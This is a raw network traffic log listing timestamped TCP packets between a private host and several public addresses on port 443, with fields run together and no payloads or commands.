                                                                                                                                                                                                            Nov 21, 2024 15:17:42.408610106 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.408627033 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.411392927 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.411425114 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.411499977 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.411647081 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.411659956 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.412316084 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.412693024 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.412708044 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.413161039 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.413165092 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517568111 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517638922 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517709970 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517792940 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517831087 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517843008 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517855883 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.517860889 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.518265009 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.518305063 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.518712044 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.518721104 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.520982981 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.521080017 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.521189928 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.521368027 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.521408081 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.596353054 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.596792936 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.596812010 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.597297907 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.597304106 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.853709936 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.853789091 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.853838921 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.855431080 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.855452061 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.855463028 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.855469942 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.863430023 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.863462925 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.863522053 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.864696980 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.864708900 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.961700916 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.961766958 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.961941957 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.962033987 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.962052107 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.962063074 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.962068081 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.965250969 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.965337038 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.965467930 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.965605021 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.965642929 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.036062956 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.036130905 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.036190033 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.036673069 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.036700010 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.036722898 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.036731958 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.042279959 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.042320967 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.042417049 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.046091080 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.046113014 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.194665909 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.194859028 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.195432901 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.195530891 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.206701994 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.206716061 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.206984997 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.207079887 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.210865021 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.255330086 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.421132088 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.421230078 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.425074100 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.425092936 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.425345898 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.425354958 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.425915956 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.425990105 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.646931887 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.647012949 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.647020102 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.647089005 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.847609043 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.847631931 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.847707033 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.847743988 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:43.847809076 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.198754072 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.249866009 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.296137094 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.296159983 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.296821117 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.296827078 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.301877975 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.311243057 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.311273098 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.311928988 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.311933994 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.585860014 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.586855888 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.586884975 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.588134050 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.588140965 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.646393061 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.646625996 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.646691084 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.647176981 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.647202015 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.647201061 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.647208929 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.653014898 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.653059959 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.653131008 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.653646946 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.653661013 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.747550011 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.750595093 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.750675917 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.750740051 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.805573940 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.825325012 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.910962105 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.022685051 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.022799969 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.022861958 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.022939920 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.022963047 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023693085 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023698092 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023890018 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023915052 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023930073 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023931026 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023936987 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023948908 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023960114 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.023966074 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.025958061 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.025971889 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.026623011 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.026638985 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.028243065 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.028285027 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.028347015 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.028939009 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.028959990 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.029028893 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.029073954 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.029138088 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.029303074 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.029309988 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.159717083 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.159751892 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.159763098 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.159807920 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.192122936 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.192189932 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.350630999 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.350709915 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.350838900 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.351032019 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.351066113 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.351094007 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.351125002 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.353621960 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.353663921 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.353970051 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.354163885 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.354177952 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.354918957 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.354989052 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.355067968 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.355149984 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.355173111 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.355190039 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.355197906 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.357750893 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.357783079 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.358175993 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.358273029 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.358279943 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.449278116 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.449337959 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.449409008 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.457077026 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.457094908 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.550955057 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.551002979 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.551225901 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.551472902 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:45.551485062 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.614535093 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.614959002 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.614983082 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.615458965 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.615463972 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.855206966 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.855808973 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.855829000 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.856345892 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.856350899 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.873704910 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.879234076 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.879256010 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.879735947 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.879741907 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.951499939 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.951575041 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.956060886 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.956068993 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.956315994 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.956322908 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.956398010 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:46.956449032 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.069224119 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.069389105 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.069495916 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.069658041 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.069658041 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.069674969 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.069684982 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.074420929 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.074462891 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.074537039 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.074795961 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.074810028 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.142096996 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.143249989 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.143275976 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.143874884 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.143882990 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.151861906 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.152232885 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.152266026 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.152729034 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.152740955 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.312263012 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.312439919 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.312522888 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.316979885 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.317003012 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.326272011 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.326347113 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.326663971 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.355976105 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.356000900 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.356012106 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.356019020 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.397212029 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.397516012 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.431194067 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.431216955 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.431308031 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.431453943 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.431468010 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.431864977 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.431962013 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.433449984 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.433578014 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.433614969 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.435750008 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.435764074 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.436000109 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.436007023 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.563792944 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.563870907 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.563905001 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.563935995 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.589946032 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.590012074 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.590120077 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.590945005 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.590960979 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.590970993 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.590976954 CET4434981913.107.246.45192.168.2.6
